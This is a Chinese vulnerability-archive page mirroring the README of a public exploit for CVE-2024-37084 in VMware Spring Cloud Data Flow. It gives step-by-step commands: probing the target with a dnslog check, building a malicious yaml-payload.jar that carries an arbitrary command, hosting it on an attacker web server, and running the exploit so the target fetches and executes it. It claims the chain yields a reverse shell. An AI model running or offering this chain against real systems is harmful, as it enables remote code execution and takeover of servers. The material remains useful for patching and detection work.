支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: c97e6c4114821dd15d588c422f6bb6cf151ebda7

来源
https://github.com/Ly4j/CVE-2024-37084-Exp
关联漏洞
标题:VMware Spring Cloud Data Flow 安全漏洞 (CVE-2024-37084)
Description:VMware Spring Cloud Data Flow是美国威睿(VMware)公司的一款用于微服务中流式处理和批处理数据的代码库。 VMware Spring Cloud Data Flow 2.11.0版本至2.11.3版本存在安全漏洞,该漏洞源于有权访问服务器API的恶意用户可以使用特制请求将任意文件写入文件系统上的任何位置。
Description
Spring Cloud Data Flow CVE-2024-37084 exp
介绍
1. Use dnslog to detect whether CVE-2024-37084 vulnerability exists, Then manually check dnslog
   
`python cve-2024-37084-exp.py -u http://192.168.67.135:7577 -dnslog xxx.dnslog.cn`

2. then you can Execute system commands
   
**first:** Enter the command you want to execute in src\artsploit\AwesomeScriptEngineFactory.java

![image](https://github.com/user-attachments/assets/bca82f8a-1b22-4cf8-adb9-96e5650153d2)

**after that:** Double-click the. py file to generate the yaml-payload.jar file.

![image](https://github.com/user-attachments/assets/c6964441-dc24-44a0-8ae4-c5bc3888e70d)

**after that:** Put yaml-payload.jar on the linux server and start a web service with python. Note: Every time you execute a different command, you need to rename yaml-payload.jar, that is, xx.jar that you access, with a different name every time. Otherwise the new command will not take effect.

The access path is as follows: http://192.168.67.133/yaml-payload.jar.

**finally:** Execute poc

`cve-2024-37084-exp.py -u http://192.168.67.135:7577 -payload http://192.168.67.133/yaml-payload.jar`

![image](https://github.com/user-attachments/assets/13536acf-afb8-4e7d-adf8-629aab9b3157)

Enter the corresponding container to view and successfully execute the command.

![image](https://github.com/user-attachments/assets/910021ef-ec3d-4536-b4af-e0c8f86f2d2c)

**Rebound shell:**
![image](https://github.com/user-attachments/assets/24a0bfc1-62f3-4489-bd81-461c6a2955ea)
![image](https://github.com/user-attachments/assets/b6f7cecf-20cd-406e-9fc2-e1284719d7ac)
文件快照

 [4.0K]  /data/pocs/c97e6c4114821dd15d588c422f6bb6cf151ebda7
├── [4.8K]  cve-2024-37084-exp.py
├── [1.5K]  README.md
└── [4.0K]  yaml-payload-master
    ├── [ 144]  generate-yaml-payload.jar.py
    ├── [4.0K]  src
    │   ├── [4.0K]  artsploit
    │   │   ├── [1.7K]  AwesomeScriptEngineFactory.class
    │   │   └── [1.7K]  AwesomeScriptEngineFactory.java
    │   └── [4.0K]  META-INF
    │       └── [4.0K]  services
    │           └── [  36]  javax.script.ScriptEngineFactory
    └── [2.4K]  yaml-payload.jar

5 directories, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。